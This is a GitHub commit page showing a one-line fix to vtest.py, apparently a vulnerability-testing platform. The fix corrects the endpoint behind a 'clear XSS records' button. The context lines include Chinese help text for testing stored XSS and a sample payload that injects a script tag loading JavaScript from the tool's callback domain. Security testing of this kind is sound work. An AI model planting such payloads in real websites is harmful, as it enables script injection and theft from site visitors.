We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 7ff0783 commit 2f58910Copy full SHA for 2f58910
vtest.py
@@ -208,7 +208,7 @@ def is_ip(ip):
208
<p><b>使用帮助:</b><br> 用于测试储存型xss漏洞
209
<br> JS地址:http://x.{domain}/xss/test/js test可自定义,用于项目区分<br> 例如:<code>'"/><script src=http://x.{domain}/xss/test/js></script></code>
210
</p>
211
- <button type="button" class="btn btn-default" onclick="send_ajax('/del/http')">清空XSS记录</button>
+ <button type="button" class="btn btn-default" onclick="send_ajax('/del/xss')">清空XSS记录</button>
212
</div>
213
<table id="xss_table" style="word-break:break-all; word-wrap:break-all;">
214
</table>
0 commit comments